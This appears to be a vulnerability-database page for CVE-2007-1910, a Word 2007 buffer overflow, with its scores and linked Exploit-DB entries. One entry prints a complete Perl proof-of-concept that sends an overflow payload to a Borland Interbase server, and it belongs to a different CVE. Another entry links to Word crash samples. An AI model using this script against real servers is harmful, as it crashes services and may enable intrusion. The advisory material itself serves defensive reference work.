CVE-2007-1910
Published 2007-04-10
Priority: P3 (36) · medium · 6.8 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 24.95% (97.6th percentile)
Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document, as demonstrated by file789-1.doc.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | word | — | — |
No detection rules found.
Exploit-DB
Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)
exploitdb·2008-04-11
CVE-2008-1910 Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)
---
###############################################################################################################
# POC.pl #
###############################################################################################################
#!/usr/bin/perl -w
#Author: Liu Zhen Hua
use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip\n";
}
if ($#ARGV new(Proto=>'tcp',
PeerAddr=>$host,
PeerPort=>3050);
my $pad0 = "\x41"x1000; #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16;
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x10".$pad5;
print $victim $exploit ;
print " + Malicious request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;
# milw0rm.com
Exploit-DB
Microsoft Word 2007 - Multiple Vulnerabilities
exploitdb·2007-04-09
CVE-2007-1911 Microsoft Word 2007 - Multiple Vulnerabilities
---
# Mati Aharoni
# muts [.@.] offensive-security.com
# http://www.offensive-security.com
My 7 line python fuzzer found several file format bugs in 3 hours. Quite alarming.
No deep analysis was done, I leave that to the community.
These are some of the results:
file789-1.doc - Unspecified Overflow in Word 2007 - Crash in wwlib.dll. Code execution is not trivial.
file798-1.doc - Word 2007 CPU exhaustion DOS - CPU shoots up to 100%.
file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100%, and Windows goes "ding!".
These files can be found at http://www.offensive-security.com/0day/0day.tar.gz
backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3690.tar.gz (04092007-0day.ta
No writeups or analysis indexed.
Published: 2007-04-10